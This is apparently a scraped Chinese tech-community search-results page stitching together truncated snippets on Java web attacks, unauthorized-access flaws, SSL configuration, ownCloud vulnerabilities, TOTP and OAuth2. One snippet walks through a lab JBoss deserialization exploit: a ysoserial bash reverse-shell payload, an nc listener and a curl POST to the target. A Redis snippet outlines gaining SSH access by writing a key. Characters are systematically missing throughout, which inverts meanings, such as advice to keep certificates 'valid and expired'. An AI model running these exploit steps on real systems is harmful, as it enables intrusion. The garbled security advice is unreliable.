首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何攻击Java Web应用

---- 1、中间件漏洞 基于Java的Web项目部署会涉及一些中间件,一旦中间件配置不当或存在高危漏洞,就会严重影响整个系统的安全。...1.1 Web中间件 Weblogic系列漏洞 弱口令 && 后台getshell SSRF漏洞 反序列化RCE漏洞 Jboss系列漏洞 授权访问Getshell 反序列化RCE漏洞 Tomcat系列漏洞...2.1 开发框架 2.1.1 Struts2 系列漏洞 S2-001 S2-061漏洞 安全公告:https://cwiki.apache.org/confluence/display/WW/Security...SpringBootVulExploit 2.1.4 Dubbo 系列漏洞 Dubbo 反序列化漏洞 Dubbo 远程代码执行漏洞 2.2、第三方组件 2.2.1 Shiro 系列漏洞 Shiro 默认密钥致命令执行漏洞...Jackson系列漏洞 反序列化RCE漏洞 2.2.4 Solr系列漏洞 XML实体注入漏洞 文件读取与SSRF漏洞 远程命令执行漏洞 2.2.5 JWT漏洞 敏感信息泄露 伪造token 暴力破解密钥

95220
您找到你想要的搜索结果了吗?
是的
没有找到

利用Weblogic的iisproxy、iisforward插件实现IIS转发

默认情况下,IIS只能提供http重定向功能,而无法满足转发需求。...举例:http://localhost/app1 利用http重定向 http://www.abc.com/app1 访问 http://loalhost/app1/abc.html 最终浏览器地址栏里的...url会变成http://www.abc.com/app1/abc.html 这就是重定向(类似jsp中的SendRedirect),如果浏览器地址栏不变,那才叫转发(类似jsp中的forward)。...在指定位置创建站点根目录,比如:D:\website\ ,并将iisforward.dll复制到此 2、根目录下,再创建子应用目录,比如app1,即:D:\website\app1,然后将iisproxy.dll复制一份该目录...)等其它webserver的IP地址 第2行,表示weblogic(或jboss)等其它webserver的端口 第6行,表示weblogic(或jboss)等其它webserver上对应的app的contextPath

91260

授权访问漏洞总结

常见的授权访问漏洞 1.MongoDB 授权访问漏洞 2.Redis 授权访问漏洞 3.Memcached 授权访问漏洞CVE-2013-7239 4.JBOSS 授权访问漏洞 5.VNC 授权访问漏洞...Redis 默认情况下会绑定在 0.0.0.0:6379这样会将 Redis 服务暴露公网上。...(2) 结合 SSH 免密码登录 ① 先在本地建个 ssh 的密钥 ssh-keygen-trsa ② 将公钥的内容写到一个文本中命令如下 (echo -e "\n\n"; cat id_rsa.pub...建议用户不要将服务发布互联网上以防被黑客利用而可以通过安全组规则或 Iptables 配置访问控制规则只允许内部必需的用户地址访问命令如下 iptables -A INPUT -p tcp -s 192.168.0.2...四、JBOSS 授权访问漏洞 漏洞信息 (1) 漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。

3.1K20

JBoss 5.x6.x 反序列化漏洞复现

影响版本: JBoss 5.x JBoss 6.x 0x02 漏洞环境 执行下面命令启动漏洞环境: cd /vulhub/jboss/CVE-2017-12149 sudo docker-compose...up -d 首次执行时会有1~3分钟时间初始化,初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。...使用ysoserial生成序列化数据,并重定向exp.ser文件 java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA...因此这里使用的利用库为CommonsCollections5(具体根据对方jdk版本选择) Tips3:我们使用bash反弹shell,由于Runtime.getRuntime().exec()中不能使用重定向和管道符符号...获取目标shell 在接收shell的攻击主机上开启端口监听 nc -lvp 7777 通过二进制POST方式发送攻击载荷exp.ser /invoker/readonly curl http://192.168.126.130

36420

十个最常见的 Web 网页安全漏洞之尾篇

(*Hashing 是将字符串字符转换为固定长度或密钥的较短字符串。...确保非现场备份已加密,但密钥是单独管理和备份的。 无法限制 URL 访问 描述 Web 应用程序在呈现受保护链接和按钮之前检查 URL 访问权限。...确保您的证书有效且过期。 例子 不使用 SSL 的应用程序,攻击者只会监视网络流量并观察经过身份验证的受害者会话 cookie。...攻击者可以窃取该 cookie 并执行中间人攻击 未经验证的重定向和转发 描述 Web 应用程序使用很少的方法将用户重定向和转发到其他页面以实现预期目的。...如果在重定向其他页面时没有正确的验证,攻击者可以利用此功能,并可以将受害者重定向网络钓鱼或恶意软件站点,或者使用转发来访问未经授权的页面。

1.3K30

Linux环境下以后台运行方式启动JBoss

1、简单开启服务器的命令:进入bin目录下,输入./standalone.sh命令。...这样服务器就会在后台运行,即使关闭命令窗口,服务器依然运行 如果使用nohup命令提交作业,那么在缺省情况下该作业的所有输出都被重定向一个名为nohup.out的文件中,除非另外指定了输出文件:nohup...3、如果使用第二种开启服务器的方式,关闭服务器就比较麻烦,分为两种: 如果是在本地操作,进入bin目录下,输入:..../jboss-admin.sh –connect command=:shutdown命令,或者暴力解决:kill -9 PID  如果是远程操作,进入bin目录下,输入:..../jboss-admin.sh --connect controller=:& lt;port> command=:shutdown命令,其中IP是安装jboss那台机的IP,端口为9999

2.4K10

为Apache创建自签名SSL证书

综上所述,这些选项将创建密钥文件和证书。我们将询问有关我们服务器的一些问题,以便将信息正确地嵌入证书中。 适当填写提示。...(推荐)我们将修改未加密的Web服务器,自动将请求重定向加密的Web服务器。 完成后,我们应该有一个安全的SSL配置。...(推荐)修改HTTP主机文件以重定向HTTPS 现在,服务器将提供未加密的HTTP和加密的HTTPS流量。为了更安全,建议自动将HTTP重定向HTTPS。如果您不想要或不需要此功能,请跳过本节。...如果您将Apache配置为HTTP重定向HTTPS,则还可以检查重定向是否正常运行: http://server_domain_or_IP 如果这显示相同的图标,这意味着您的重定向工作正常。...添加permanent该行,将重定向从302临时重定向更改为301永久重定向: . . . ​

6K100

如何在Debian 9中为Apache创建自签名SSL证书

如上所述,这些选项将创建密钥文件和证书。我们将询问有关我们服务器的一些问题,以便将信息正确地嵌入证书中。 适当填写提示。...(推荐)修改HTTP主机文件以重定向HTTPS 现在,服务器将提供未加密的HTTP和加密的HTTPS流量。为了更好的安全性,建议在大多数情况下自动将HTTP重定向HTTPS。...如果您将Apache配置为将HTTP重定向HTTPS,则还可以检查重定向是否正常运行: http://server_domain_or_IP 如果这导致相同的图标,这意味着您的重定向工作正常。...但是,您之前创建的重定向只是临时重定向。如果您想永久重定向HTTPS,请继续执行最后一步。...添加permanent该行,将重定向从302临时重定向更改为301永久重定向: . . . ​

2.5K75

SpringBoot两种方式配置 HTTPS 安全证书

) -keyalg (生证书的算法名称) -keysize (密钥长度,证书大小) -keystore (指定生成证书的位置和证书名称) -validity (证书有效期,天单位) keytool -...server.ssl.keyStoreType: PKCS12 #证书别名 #server.ssl.keyAlias: uublog 若指定的端口非443,则在访问的时添加具体的端口号 将http重定向...org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; /** * @Description: Http重定向...若部署环境为windows,直接启动即可;若部署环境是Linux,先开通443端口,在进行部署 # 判断443端口是否已经开放 firewall-cmd --query-port=443/tcp # 若开放...jks #证书密码,请修改为您自己证书的密码. server.ssl.key-store-password: *** #秘钥库类型 server.ssl.keyStoreType: JKS 4.将http重定向

1.2K10

如何在Ubuntu 16.04中为Apache创建自签名SSL证书

如上所述,这些选项将创建密钥文件和证书。我们将询问有关我们服务器的一些问题,以便将信息正确地嵌入证书中。 适当填写提示。...(推荐)我们将修改未加密的虚拟主机文件,以自动将请求重定向加密的虚拟主机。 完成后,我们应该有一个安全的SSL配置。...(推荐)修改未加密的虚拟主机文件以重定向HTTPS 现在,服务器将提供未加密的HTTP和加密的HTTPS流量。为了更好的安全性,建议在大多数情况下自动将HTTP重定向HTTPS。...如果您将Apache配置为将HTTP重定向HTTPS,则还可以检查重定向是否正常运行: http://server_domain_or_IP 如果这导致相同的图标,这意味着您的重定向工作正常。...添加permanent该行,将重定向从302临时重定向更改为301永久重定向: . . . ​

1.7K00

开源软件又出大事件,ownCloud 曝出三个严重漏洞

该漏洞影响了 graphapi 0.2.0 至 0.3.0,问题源于该应用程序对第三方库的依赖,该库通过 URL 公开了 PHP 环境详细信息,从而暴露了 ownCloud 管理员密码、邮件服务器凭据和许可证密钥...第二个漏洞的 CVSS v3 得分为 9.8,该漏洞可能影响 ownCloud 核心库 10.6.0 至 10.13.0 版本,涉及身份验证旁路问题。...如果用户的用户名已知且配置签名密钥(默认设置),攻击者就有可能在未经身份验证的情况下访问、修改或删除任何文件。 已公布的解决方案是,如果没有为文件所有者配置签名密钥,则拒绝使用预签名 URL。...第三个不太严重的漏洞(CVSS v3 得分:9),涉及子域验证绕过问题,影响 0.6.1 以下所有版本的 oauth2 库。...在 oauth2 应用程序中,攻击者可以输入特制的重定向 URL,绕过验证码,将回调重定向攻击者控制的域。 官方建议采取的缓解措施是加固 Oauth2 应用程序中的验证代码。

33210

开源软件又出大事件,ownCloud 曝出三个严重漏洞

该漏洞影响了 graphapi 0.2.0 至 0.3.0,问题源于该应用程序对第三方库的依赖,该库通过 URL 公开了 PHP 环境详细信息,从而暴露了 ownCloud 管理员密码、邮件服务器凭据和许可证密钥...第二个漏洞的 CVSS v3 得分为 9.8,该漏洞可能影响 ownCloud 核心库 10.6.0 至 10.13.0 版本,涉及身份验证旁路问题。...如果用户的用户名已知且配置签名密钥(默认设置),攻击者就有可能在未经身份验证的情况下访问、修改或删除任何文件。 已公布的解决方案是,如果没有为文件所有者配置签名密钥,则拒绝使用预签名 URL。...第三个不太严重的漏洞(CVSS v3 得分:9),涉及子域验证绕过问题,影响 0.6.1 以下所有版本的 oauth2 库。...在 oauth2 应用程序中,攻击者可以输入特制的重定向 URL,绕过验证码,将回调重定向攻击者控制的域。 官方建议采取的缓解措施是加固 Oauth2 应用程序中的验证代码。

26110

使用aerogear生成totp

由于google的软件在国内被墙,因此可以使用阿里云的身份宝 服务端 服务端的话,google官方有c的代码,java的话很多第三方都有实现,这里选择jboss提供的aerogear-otp-java,... 1.0.0 步骤 主要的步骤如下: 绑定密钥 服务端为每个账户生成一个secret...并保存下来 服务端提供该密钥的二维码扫描功能,方便客户端扫描绑定账号 用户手机安装Google Authenticator APP或阿里云的身份宝,扫描二维码绑定该账号的secret 使用otp验证 绑定...实例 生成客户端密钥的二维码 String secret = Base32.random(); Totp totp = new Totp(secret); String uri = totp.uri(account...默认值是1,即允许那个code在手机端过期30秒之内服务端验证还有效。 clock aerogear-otp-java-1.0.0-sources.jar!

1.7K20

五千来字小作文,是的,我们是有个HTTP。

3xx的响应结果就表明浏览器需要执行某些特殊的处理以正确处理请求 301 Moved Permanently:永久重定向。...表示请求的资源已经被分配了新的URI,以后应该使用新的URI 302 Found:临时重定向。...304 Not Modified:客户端发送附带条件(请求首部中if开头的属性中的一种)的请求的时候,服务端允许访问资源,但是那些请求并没有满足,直接返回304,即服务端资源未改变,可以直接使用客户端过期的缓存...,请修改请求内容后再发送请求 401 Unauthorized:客户端认证授权 403 Forbidden:服务端禁止客户端访问此资源 404 Not Found:URL写错了,找不到此路径 5xx...有兴趣的同学可以自行去了解下~ 所以HTTPS靠非对称性加密及数字证书保证了安全性 写在最后 总结 此文章从HTTP报文结构开始,HTTP首部,返回状态码,cookie,再延伸到HTTPS加密方式

40130

从0开始构建一个Oauth2Server服务 单页应用

这是您希望在授权完成后将用户重定向的 URL。这必须与您之前在服务中注册的重定向 URL 相匹配。 scope(可选) 包含一个或多个范围值以请求额外的访问级别。这些值将取决于特定的服务。...当用户被重定向回您的应用程序时,您作为状态包含的任何值也将包含在重定向中。这使您的应用程序有机会在用户被定向授权服务器和再次返回之间持久保存数据,例如使用状态参数作为会话密钥。...这有助于确保您只交换您请求的授权码,防止者使用任意或窃取的授权码重定向您的回调 URL。 交换访问令牌的授权代码 为了交换访问令牌的授权代码,应用程序向服务的令牌端点发出 POST 请求。...由于使用秘密,因此除了使用已注册的重定向 URL 之外,无法验证客户端的身份。这就是为什么您需要使用 OAuth 2.0 服务预先注册您的重定向 URL。...也几乎不需要刷新令牌,因为 JavaScript 应用程序只会在用户积极使用浏览器时运行,因此它们可以在需要时重定向授权服务器以获取新的访问令牌。

18030
领券